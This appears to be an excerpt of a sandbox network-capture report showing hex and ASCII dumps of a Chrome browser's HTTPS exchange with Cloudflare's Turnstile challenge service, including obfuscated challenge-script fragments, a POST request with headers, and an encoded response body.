                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 37 28 37 35 39 29 5d 5b 68 37 28 31 32 33 34 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 68 37 28 31 37 34 30 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 37 28 37 35 39 29 5d 5b 68 37 28 34 31 33 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 37 28 37 35 39 29 5d 5b 68 37 28 36 31 35 29 5d 2c 27 63 6f 64 65 27 3a 68 37 28 31 33 38 35 29 2c 27 72 63 56 27 3a 65 4d 5b 68 37 28 37 35 39 29 5d 5b 68 37 28 36 35 38 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4c 28 33 38 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 68 38 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 29 7b 69 3d 28 68 38 3d 67 4c 2c 7b 27 74 48 44 44 64 27 3a 66 75 6e 63 74 69 6f 6e 28
                                                                          Data Ascii: 'widgetId':eM[h7(759)][h7(1234)],'event':e[h7(1740)],'cfChlOut':eM[h7(759)][h7(413)],'cfChlOutS':eM[h7(759)][h7(615)],'code':h7(1385),'rcV':eM[h7(759)][h7(658)]},'*'))},g)},eM[gL(381)]=function(f,g,h,h8,i,j,k,l,m,n,o,s,x,B,C,D){i=(h8=gL,{'tHDDd':function(
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 2c 65 4d 5b 67 4c 28 34 38 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 68 39 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6f 2c 6d 29 7b 28 68 39 3d 67 4c 2c 65 3d 7b 27 44 52 64 70 42 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 26 6e 7d 2c 27 71 4f 44 54 66 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 6f 7d 2c 27 4e 52 6f 54 50 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 7d 2c 27 55 72 73 48 69 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 75 6f 61 53 47 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 2c 27 5a 46 62 4c 71 27 3a
                                                                          Data Ascii: ,eM[gL(487)]=function(d,h9,e,f,g,h,i,j,k,l,o,m){(h9=gL,e={'DRdpB':function(n,o){return o&n},'qODTf':function(n,o){return n==o},'NRoTP':function(n,o){return n instanceof o},'UrsHi':function(n,o){return o===n},'uoaSG':function(n,o,s){return n(o,s)},'ZFbLq':
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 69 31 2c 64 2c 65 29 7b 69 66 28 69 31 3d 67 4c 2c 64 3d 7b 27 71 4f 59 46 77 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 62 47 47 48 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 3d 3d 3d 66 7d 2c 27 64 64 72 41 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3d 3d 3d 67 7d 2c 27 51 79 53 4a 59 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3d 3d 3d 67 7d 2c 27 79 52 65 79 46 27 3a 69 31 28 33 37 39 29 2c 27 75 48 4a 59 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 28 67 29 7d 7d 2c 65 3d 63 5b 69 31 28 35 33 33 29 5d 2c 65 26 26 64 5b 69 31 28 39 36 32 29 5d 28 65 5b 69 31 28 39 34 36 29 5d 2c 69 31 28 31 35
                                                                          Data Ascii: i1,d,e){if(i1=gL,d={'qOYFw':function(f){return f()},'bGGHK':function(f,g){return g===f},'ddrAL':function(f,g){return f===g},'QySJY':function(f,g){return f===g},'yReyF':i1(379),'uHJYO':function(f,g){return f(g)}},e=c[i1(533)],e&&d[i1(962)](e[i1(946)],i1(15
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 4a 28 31 33 37 36 29 2c 27 68 6b 61 46 73 27 3a 69 4a 28 38 37 39 29 2c 27 48 68 66 65 63 27 3a 69 4a 28 38 34 34 29 2c 27 6f 4b 7a 44 61 27 3a 69 4a 28 31 30 38 35 29 2c 27 6d 69 61 54 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 66 6f 4b 5a 41 27 3a 69 4a 28 31 37 35 34 29 2c 27 42 64 4e 69 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 5e 69 7d 2c 27 4d 63 62 76 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 5e 68 7d 2c 27 56 6b 52 53 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 69 73 44 46 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 5e 69 7d 2c 27 79 48 59 6d 6b 27 3a 66 75 6e
                                                                          Data Ascii: J(1376),'hkaFs':iJ(879),'Hhfec':iJ(844),'oKzDa':iJ(1085),'miaTY':function(h,i){return h>i},'foKZA':iJ(1754),'BdNiy':function(h,i){return h^i},'McbvJ':function(h,i){return i^h},'VkRSQ':function(h,i){return h+i},'isDFw':function(h,i){return h^i},'yHYmk':fun
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 49 74 48 67 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4a 46 71 5a 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 70 64 41 58 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 69 4a 28 34 33 38 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 4b 29 7b 69 66 28 69 4b 3d 69 4a 2c 64 5b 69 4b 28 31 37 32 33 29 5d 28 64 5b 69 4b 28 31 33 31 39 29 5d 2c 64 5b 69 4b 28 37 35 36 29 5d 29 29 64 5b 69 4b 28 34 33 30 29 5d 28 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 68 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28
                                                                          Data Ascii: eturn h(i)},'ItHgS':function(h,i){return h(i)},'JFqZe':function(h,i){return h-i},'pdAXO':function(h,i){return h==i}},e=String[iJ(438)],f={'h':function(h,iK){if(iK=iJ,d[iK(1723)](d[iK(1319)],d[iK(756)]))d[iK(430)]();else return null==h?'':f.g(h,6,function(
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 5b 69 4d 28 37 35 39 29 5d 5b 69 4d 28 31 31 39 35 29 5d 3d 61 51 5b 69 4d 28 37 36 35 29 5d 7c 7c 30 2c 61 52 5b 69 4d 28 37 35 39 29 5d 5b 69 4d 28 31 33 35 30 29 5d 3d 61 53 5b 69 4d 28 31 32 31 30 29 5d 7c 7c 30 2c 61 54 5b 69 4d 28 37 35 39 29 5d 5b 69 4d 28 37 30 30 29 5d 3d 61 55 5b 69 4d 28 31 30 33 37 29 5d 7c 7c 30 2c 61 56 5b 69 4d 28 37 35 39 29 5d 5b 69 4d 28 31 33 31 38 29 5d 3d 61 57 5b 69 4d 28 36 33 31 29 5d 7c 7c 30 2c 61 58 5b 69 4d 28 37 35 39 29 5d 5b 69 4d 28 31 31 35 39 29 5d 3d 61 59 5b 69 4d 28 31 32 33 37 29 5d 7c 7c 30 2c 61 5a 5b 69 4d 28 37 35 39 29 5d 5b 69 4d 28 37 35 31 29 5d 3d 62 30 5b 69 4d 28 38 36 31 29 5d 28 29 2c 28 64 5b 69 4d 28 31 36 30 32 29 5d 28 62 31 5b 69 4d 28 37 35 39 29 5d 5b 69 4d 28 36 37 32 29 5d 2c 34
                                                                          Data Ascii: [iM(759)][iM(1195)]=aQ[iM(765)]||0,aR[iM(759)][iM(1350)]=aS[iM(1210)]||0,aT[iM(759)][iM(700)]=aU[iM(1037)]||0,aV[iM(759)][iM(1318)]=aW[iM(631)]||0,aX[iM(759)][iM(1159)]=aY[iM(1237)]||0,aZ[iM(759)][iM(751)]=b0[iM(861)](),(d[iM(1602)](b1[iM(759)][iM(672)],4


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.1649724104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:53 UTC1149OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/602828571:1730216247:hU1JVbyKijtdUyJpcPx_11H0qSWFqnmCkoLtpOk75jI/8da452d5f8116bbc/Y4JbOerefBrl_xn27RO.r1PJgKAyhh88MgRHz4pkaHg-1730217050-1.1.1.1-hZ4u92QJ8.qahDCTU7tcTZODizOTEhVvtOWCRf7Vi9oLDra6izqze2UIynKjFRXc HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 3228
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          CF-Challenge: Y4JbOerefBrl_xn27RO.r1PJgKAyhh88MgRHz4pkaHg-1730217050-1.1.1.1-hZ4u92QJ8.qahDCTU7tcTZODizOTEhVvtOWCRf7Vi9oLDra6izqze2UIynKjFRXc
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://challenges.cloudflare.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:53 UTC3228OUTData Raw: 76 5f 38 64 61 34 35 32 64 35 66 38 31 31 36 62 62 63 3d 63 42 66 51 77 51 53 51 44 51 54 51 77 69 79 25 32 62 69 79 7a 51 69 52 44 39 77 73 69 6d 74 69 46 46 79 49 61 79 44 4e 51 79 76 79 48 51 63 39 38 46 79 47 51 4c 7a 66 51 44 70 45 66 79 39 51 66 42 69 61 59 38 66 51 79 70 43 79 4c 66 38 45 79 5a 67 79 48 44 61 6e 66 74 79 4f 51 38 36 72 79 4f 61 4e 79 46 63 51 44 67 50 52 52 73 6a 63 70 79 47 79 4c 45 4a 79 5a 31 67 38 59 79 6e 30 4a 79 57 30 72 6a 47 68 77 48 65 6f 39 79 50 74 65 4d 4e 45 79 77 53 79 76 46 4c 36 76 7a 79 79 4f 4d 52 79 44 76 51 41 4c 77 63 35 79 4a 45 36 42 76 4f 52 37 51 36 79 39 4e 79 2b 6d 5a 49 63 45 79 41 4f 66 66 36 50 54 51 38 38 6a 52 79 34 30 69 51 59 6d 38 37 4b 69 61 42 79 4d 31 64 6b 4b 61 7a 6f 51 77 4c 4a 72 71 73 79
                                                                          Data Ascii: v_8da452d5f8116bbc=cBfQwQSQDQTQwiy%2biyzQiRD9wsimtiFFyIayDNQyvyHQc98FyGQLzfQDpEfy9QfBiaY8fQypCyLf8EyZgyHDanftyOQ86ryOaNyFcQDgPRRsjcpyGyLEJyZ1g8Yyn0JyW0rjGhwHeo9yPteMNEywSyvFL6vzyyOMRyDvQALwc5yJE6BvOR7Q6y9Ny+mZIcEyAOff6PTQ88jRy40iQYm87KiaByM1dkKazoQwLJrqsy
                                                                          2024-10-29 15:50:53 UTC747INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:50:53 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 149640
                                                                          Connection: close
                                                                          cf-chl-gen: ujOD4DrZQkTbuuCE/ekVEeMoGYnNy6jDYoIf8zeiojR/MzfV8sXhRCZvGA7/HfXZeImieXZsJ+PWCA/o8KAubbk6GGkTdP9Hi2ThtMf+8prOdXbeXleneW2S6zHxa6ltPI1ldbPoJN/qlahV/9ou45B+yyJ0dK0dkX6HkAjGEgm5r9J/AWDpcUpH0CZaUmcJCXsE5UZH3rKUC4hFXN8GgC4gTpsKhFJwfI232y1wB53RgOSHbZECWt7HXOlpgJV/FqqYtDjCc6f1gIYnnatlTJn7EJDqiJoyRYpfzRq7Oe5nAHTGXSk4RX/UTFpwSxlQPYfY2WySHKhFcuh4K1xMrpOSyxcaSAkToKbS/s9UDXkKf6qz7WGEdX/bFTqh1//HNkjr2atR5seg5ODycF8jLjE6LKvbJQ445d05PbyMfnDNkP6KyU6puA2ORH3VCuvm9ER3phubnDOX7dC96Bgm7ea4P+L7QvkFnBdf57Yndc3tfYk=$X4glXi/2OAXrXwt7
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da452e72bbba915-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:50:53 UTC622INData Raw: 6b 4a 56 74 63 59 5a 6e 69 5a 61 45 56 6d 65 61 58 59 36 5a 64 5a 74 69 6d 71 4f 6a 65 31 79 67 6f 35 65 73 6c 35 69 70 6f 70 53 6e 6e 5a 36 71 6a 6f 6d 58 6c 62 43 35 74 4a 6d 51 72 35 4b 63 6c 49 53 69 6c 4b 53 46 77 38 47 66 70 70 71 62 6d 70 6d 76 71 38 6a 52 79 4a 43 67 74 4c 61 6d 32 4b 57 37 75 4e 54 65 76 71 75 73 30 36 57 7a 73 2b 66 46 70 37 53 32 79 72 7a 4e 36 4f 75 74 77 2f 54 4b 31 63 66 34 7a 73 76 48 78 72 33 57 79 4d 6e 61 30 4f 48 6d 41 50 37 56 34 76 6a 54 33 2f 66 75 33 4f 59 4a 44 41 33 67 46 4e 58 74 34 42 6a 5a 37 2b 6e 34 48 78 33 71 2b 52 45 61 48 76 6a 30 2b 75 58 36 34 79 77 70 35 67 50 37 37 52 34 6c 42 67 34 75 49 79 49 75 39 67 30 72 4d 67 38 5a 49 44 55 72 47 66 73 78 42 6a 64 43 50 7a 39 46 50 53 6f 62 54 30 31 51 45 6b 51
                                                                          Data Ascii: kJVtcYZniZaEVmeaXY6ZdZtimqOje1ygo5esl5ipopSnnZ6qjomXlbC5tJmQr5KclISilKSFw8Gfppqbmpmvq8jRyJCgtLam2KW7uNTevqus06Wzs+fFp7S2yrzN6Outw/TK1cf4zsvHxr3WyMna0OHmAP7V4vjT3/fu3OYJDA3gFNXt4BjZ7+n4Hx3q+REaHvj0+uX64ywp5gP77R4lBg4uIyIu9g0rMg8ZIDUrGfsxBjdCPz9FPSobT01QEkQ
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 5a 43 4a 7a 77 6d 53 6b 42 4d 58 6d 74 4c 54 7a 35 64 4e 6d 5a 4d 53 55 5a 54 54 48 35 4a 66 6c 68 65 56 6c 74 63 55 6c 31 55 52 49 4e 49 66 49 64 2f 62 33 74 5a 57 32 68 71 56 4a 46 77 63 32 53 54 69 58 4e 73 66 49 70 5a 67 57 31 35 66 6d 36 66 6d 32 64 7a 70 4a 5a 7a 71 6f 4b 6c 72 6f 4b 62 6a 71 6d 76 6e 59 65 44 6a 59 71 4a 6a 5a 53 62 6e 37 36 74 72 62 2f 43 67 38 4f 53 67 38 57 43 77 4c 61 56 72 49 69 65 6e 34 65 37 6a 4b 32 68 73 39 65 76 6c 59 79 71 75 35 58 47 6e 4c 72 55 76 4d 44 62 75 73 54 47 34 62 6d 2b 32 38 54 71 77 73 37 6e 36 4c 76 43 36 4f 62 41 37 4d 2b 32 39 38 72 6d 7a 77 44 7a 36 39 50 34 7a 65 2f 58 2f 4f 48 7a 32 77 4c 56 39 39 38 47 36 66 76 6a 43 67 51 41 35 77 76 68 42 4f 73 50 39 51 6a 76 45 79 41 4d 38 78 6a 74 45 50 63 63 45
                                                                          Data Ascii: ZCJzwmSkBMXmtLTz5dNmZMSUZTTH5JflheVltcUl1URINIfId/b3tZW2hqVJFwc2STiXNsfIpZgW15fm6fm2dzpJZzqoKlroKbjqmvnYeDjYqJjZSbn76trb/Cg8OSg8WCwLaVrIien4e7jK2hs9evlYyqu5XGnLrUvMDbusTG4bm+28Tqws7n6LvC6ObA7M+298rmzwDz69P4ze/X/OHz2wLV998G6fvjCgQA5wvhBOsP9QjvEyAM8xjtEPccE
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 6a 50 43 64 50 61 6c 31 74 53 44 64 6b 4e 44 56 70 62 33 5a 6e 56 7a 4a 35 57 33 31 78 56 31 52 5a 63 31 74 2b 5a 58 64 66 67 6f 39 37 59 34 64 64 66 32 65 4c 67 59 6c 76 6c 58 47 57 68 5a 2b 62 65 35 46 62 57 35 75 61 64 56 6c 36 5a 32 6c 6c 66 58 32 4f 73 49 43 43 67 72 53 45 69 34 61 34 69 49 32 4b 76 49 79 53 6a 73 43 51 6e 4a 4c 45 6c 4a 32 57 79 4a 69 69 6d 73 79 63 71 63 4b 65 69 73 53 72 6f 4d 47 67 79 5a 2f 4e 30 35 4b 6a 7a 4d 2b 57 70 39 6a 63 75 4c 53 61 6f 71 2f 56 31 4e 2f 59 33 4f 44 6c 36 4d 2f 66 36 63 44 76 33 61 36 75 34 39 50 49 78 72 66 48 2b 4c 71 37 33 38 44 68 79 2f 59 42 38 67 59 48 32 74 66 68 39 51 45 4c 32 41 67 50 43 76 76 6d 45 42 58 70 7a 39 44 53 42 65 72 32 42 78 44 33 2b 79 49 50 44 64 73 6a 35 67 67 58 4b 53 55 6d 2b 69
                                                                          Data Ascii: jPCdPal1tSDdkNDVpb3ZnVzJ5W31xV1RZc1t+ZXdfgo97Y4ddf2eLgYlvlXGWhZ+be5FbW5uadVl6Z2llfX2OsICCgrSEi4a4iI2KvIySjsCQnJLElJ2WyJiimsycqcKeisSroMGgyZ/N05KjzM+Wp9jcuLSaoq/V1N/Y3ODl6M/f6cDv3a6u49PIxrfH+Lq738Dhy/YB8gYH2tfh9QEL2AgPCvvmEBXpz9DSBer2BxD3+yIPDdsj5ggXKSUm+i
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 61 6c 46 6a 53 32 35 37 5a 30 39 7a 53 57 74 54 64 32 31 31 57 34 46 64 67 6e 47 4c 68 32 64 39 52 30 65 48 68 6e 4e 53 5a 33 35 4e 54 57 74 70 56 5a 78 73 62 6d 36 67 63 48 64 79 70 48 52 35 64 71 68 34 66 6e 39 2b 66 61 4f 61 70 58 32 43 68 49 43 7a 6a 58 56 70 70 4a 57 31 69 35 61 63 65 58 71 4e 6c 37 71 2f 6e 34 4b 50 78 4c 36 56 6e 72 79 32 74 5a 33 49 72 4c 6d 4d 76 72 54 4c 78 36 32 6d 6d 64 61 53 32 37 43 61 30 37 48 66 77 62 7a 4f 34 74 6d 34 76 70 2f 5a 33 71 50 5a 78 4c 66 75 33 38 66 4e 33 39 44 68 78 38 37 59 74 74 76 4a 30 66 62 36 2b 76 50 52 79 39 54 78 31 67 6a 31 35 51 62 6b 42 76 58 47 32 51 48 6c 7a 65 2f 74 36 75 66 55 47 51 54 52 38 64 54 62 36 65 6a 34 39 67 30 67 41 2b 41 6b 43 65 67 69 46 2f 4d 61 41 50 77 59 48 41 51 6e 4e 43 41
                                                                          Data Ascii: alFjS257Z09zSWtTd211W4FdgnGLh2d9R0eHhnNSZ35NTWtpVZxsbm6gcHdypHR5dqh4fn9+faOapX2ChICzjXVppJW1i5aceXqNl7q/n4KPxL6Vnry2tZ3IrLmMvrTLx62mmdaS27Ca07HfwbzO4tm4vp/Z3qPZxLfu38fN39Dhx87YttvJ0fb6+vPRy9Tx1gj15QbkBvXG2QHlze/t6ufUGQTR8dTb6ej49g0gA+AkCegiF/MaAPwYHAQnNCA
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 33 56 37 65 32 31 59 65 48 68 30 68 6e 42 35 65 33 70 65 65 55 6c 74 65 30 46 74 58 57 31 6e 61 31 43 4c 54 59 35 72 5a 46 69 4d 57 6e 69 58 6d 5a 65 65 6c 61 43 63 6f 49 65 6a 6f 58 69 56 6c 58 70 6d 67 34 5a 73 6f 33 79 47 63 49 53 45 70 34 4f 71 6d 62 47 54 71 35 61 5a 75 70 36 59 77 61 32 36 6f 62 6d 62 74 70 71 6c 72 61 2b 73 6a 73 57 79 7a 4a 37 4d 70 38 47 32 72 5a 69 57 76 49 2b 30 6e 4c 4c 58 31 4f 4c 58 78 72 6a 6e 6f 4d 44 69 33 4f 6d 38 37 74 37 77 35 73 7a 71 72 73 58 33 38 4e 50 79 79 50 57 36 37 37 6e 36 2b 2b 6e 6a 77 4f 4c 39 2b 4d 4d 47 34 38 66 66 34 67 37 2b 36 41 44 52 7a 75 2f 74 36 52 58 4e 43 51 66 4d 43 67 76 75 46 2f 49 59 38 52 76 35 46 65 49 42 45 42 30 70 47 2f 6b 6a 46 2b 30 46 41 2b 63 77 48 53 6f 52 4e 68 6b 45 38 69 59 4e
                                                                          Data Ascii: 3V7e21YeHh0hnB5e3peeUlte0FtXW1na1CLTY5rZFiMWniXmZeelaCcoIejoXiVlXpmg4Zso3yGcISEp4OqmbGTq5aZup6Ywa26obmbtpqlra+sjsWyzJ7Mp8G2rZiWvI+0nLLX1OLXxrjnoMDi3Om87t7w5szqrsX38NPyyPW677n6++njwOL9+MMG48ff4g7+6ADRzu/t6RXNCQfMCgvuF/IY8Rv5FeIBEB0pG/kjF+0FA+cwHSoRNhkE8iYN
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 56 30 51 6d 42 5a 66 49 68 37 57 59 4b 42 52 55 35 76 62 56 4a 6d 69 46 57 56 67 45 35 32 55 6d 65 46 6a 6e 4a 70 6f 49 32 42 6b 61 57 69 6c 56 6c 33 65 61 4b 43 6e 71 57 42 5a 6f 70 77 62 71 57 6e 68 35 42 75 74 6f 71 69 64 48 4f 55 74 72 43 78 6b 4d 4b 79 75 4c 71 67 76 73 4b 2b 70 4d 4c 4b 77 71 6a 47 69 71 48 54 7a 4b 2f 4f 70 4e 47 57 79 35 58 57 31 38 57 2f 33 64 79 37 32 70 36 36 35 64 61 35 76 4f 6d 30 78 63 44 74 75 64 2f 45 38 62 33 55 34 37 53 79 34 74 44 48 36 63 6e 6d 78 74 6a 6e 2b 66 50 4c 41 39 65 37 30 2b 44 51 2f 4d 44 35 35 67 62 68 35 50 7a 4e 7a 51 49 49 44 51 63 52 30 77 66 6f 31 65 58 57 41 4f 6a 35 34 41 4c 38 39 76 6e 31 33 2f 45 6c 46 2f 4d 72 43 50 62 2b 42 43 55 76 44 53 77 76 4a 66 49 54 45 79 6f 4d 47 77 6b 30 2b 68 30 41 4e
                                                                          Data Ascii: V0QmBZfIh7WYKBRU5vbVJmiFWVgE52UmeFjnJpoI2BkaWilVl3eaKCnqWBZopwbqWnh5ButoqidHOUtrCxkMKyuLqgvsK+pMLKwqjGiqHTzK/OpNGWy5XW18W/3dy72p665da5vOm0xcDtud/E8b3U47Sy4tDH6cnmxtjn+fPLA9e70+DQ/MD55gbh5PzNzQIIDQcR0wfo1eXWAOj54AL89vn13/ElF/MrCPb+BCUvDSwvJfITEyoMGwk0+h0AN
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 70 61 56 74 67 59 49 4b 44 54 59 57 4a 62 6e 56 7a 55 33 64 55 55 35 4e 55 6c 47 36 55 58 35 4a 2f 6b 47 36 56 68 70 32 63 67 6e 53 70 5a 71 57 41 62 35 78 73 62 61 47 6e 72 70 2b 50 61 72 47 51 6a 36 6d 50 6a 4b 65 72 6b 37 62 44 72 35 65 37 6b 62 4f 62 76 37 57 39 6f 38 6d 6c 79 72 6e 54 7a 36 2f 46 6a 34 2f 50 7a 73 4b 6f 78 62 6d 76 71 4c 69 75 72 35 7a 65 72 73 44 50 34 63 71 79 36 38 7a 72 77 2b 37 52 79 62 4c 76 7a 74 48 72 30 75 6e 4e 39 38 7a 55 31 38 2f 6f 38 75 6e 72 31 67 44 33 38 64 34 4b 30 2f 76 6f 43 4d 6f 51 77 63 38 49 30 4d 7a 63 7a 52 4c 6a 38 64 41 4a 31 2f 63 58 44 66 73 68 47 74 76 37 2b 42 72 36 38 68 4d 49 42 77 4d 4d 48 69 45 59 4a 65 30 75 4a 52 41 30 43 67 63 48 44 53 4d 72 4d 67 77 2b 4b 78 77 4e 50 78 41 75 4f 78 73 53 51 45
                                                                          Data Ascii: paVtgYIKDTYWJbnVzU3dUU5NUlG6UX5J/kG6Vhp2cgnSpZqWAb5xsbaGnrp+ParGQj6mPjKerk7bDr5e7kbObv7W9o8mlyrnTz6/Fj4/PzsKoxbmvqLiur5zersDP4cqy68zrw+7RybLvztHr0unN98zU18/o8unr1gD38d4K0/voCMoQwc8I0MzczRLj8dAJ1/cXDfshGtv7+Br68hMIBwMMHiEYJe0uJRA0CgcHDSMrMgw+KxwNPxAuOxsSQE
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 58 34 79 4d 5a 56 47 4b 5a 48 64 74 5a 70 5a 6f 66 57 36 4a 6a 70 6d 41 58 6e 6c 67 6b 33 4a 68 64 70 70 37 67 4b 57 42 62 34 4a 77 62 59 2b 6e 69 4a 43 71 67 4b 6c 31 6b 36 71 57 69 48 69 75 71 35 61 38 75 37 32 54 77 4a 4b 35 71 73 48 41 70 70 6a 4e 69 73 6d 6b 6b 38 43 51 6b 63 71 67 79 5a 4f 6a 30 72 61 6f 72 63 37 4c 72 72 71 2f 32 74 6e 51 77 72 62 64 6e 63 61 32 79 65 66 70 32 73 4f 38 38 72 2f 46 35 38 7a 75 73 73 37 59 35 72 6a 55 34 50 66 7a 32 63 37 46 41 37 34 48 76 39 4c 42 39 41 45 4c 38 41 49 4d 45 65 62 79 43 38 37 71 35 75 6f 44 44 50 62 61 48 68 6b 61 37 65 45 68 45 67 37 67 49 66 72 6b 43 2f 51 49 4a 65 76 68 36 51 6b 72 4a 53 59 46 4e 79 63 74 4c 78 55 7a 4e 7a 4d 5a 4e 7a 38 33 48 54 76 2b 46 6b 68 42 4a 45 4d 5a 52 67 74 41 43 6b 74
                                                                          Data Ascii: X4yMZVGKZHdtZpZofW6JjpmAXnlgk3Jhdpp7gKWBb4JwbY+niJCqgKl1k6qWiHiuq5a8u72TwJK5qsHAppjNismkk8CQkcqgyZOj0raorc7Lrrq/2tnQwrbdnca2yefp2sO88r/F58zuss7Y5rjU4Pfz2c7FA74Hv9LB9AEL8AIMEebyC87q5uoDDPbaHhka7eEhEg7gIfrkC/QIJevh6QkrJSYFNyctLxUzNzMZNz83HTv+FkhBJEMZRgtACkt
                                                                          2024-10-29 15:50:53 UTC1369INData Raw: 34 2b 4f 69 6d 2b 46 69 6c 5a 61 63 6f 47 55 57 58 64 32 59 61 68 34 66 33 71 73 66 49 46 2b 73 49 43 47 67 72 53 45 6b 49 61 34 69 4a 47 4b 76 49 79 57 6a 73 43 51 6e 5a 4c 45 6c 4b 4b 62 6d 34 6a 41 74 4b 53 65 79 71 36 65 72 61 4b 78 6a 73 66 4f 6f 4b 4b 50 6b 63 65 6f 30 74 4f 57 79 63 6d 36 34 37 66 41 6c 37 32 2f 78 4b 58 65 35 39 71 35 75 4c 66 69 76 4d 72 47 31 4b 79 74 7a 37 53 32 32 75 2f 33 32 4c 65 31 38 74 4c 5a 32 63 2f 41 34 51 6a 61 38 38 54 48 33 67 6e 36 31 78 4c 4f 37 73 76 6d 2f 74 4c 75 36 66 55 56 44 2f 51 65 32 77 30 59 37 53 41 50 45 53 45 57 2b 77 67 4a 49 41 73 63 36 76 59 63 4a 43 49 64 42 76 34 33 4f 41 6b 43 2b 42 41 49 46 53 30 2f 51 44 67 6a 4f 7a 73 46 41 7a 77 56 48 45 70 48 42 53 45 6a 44 44 78 4e 44 69 6f 68 4d 53 51 33
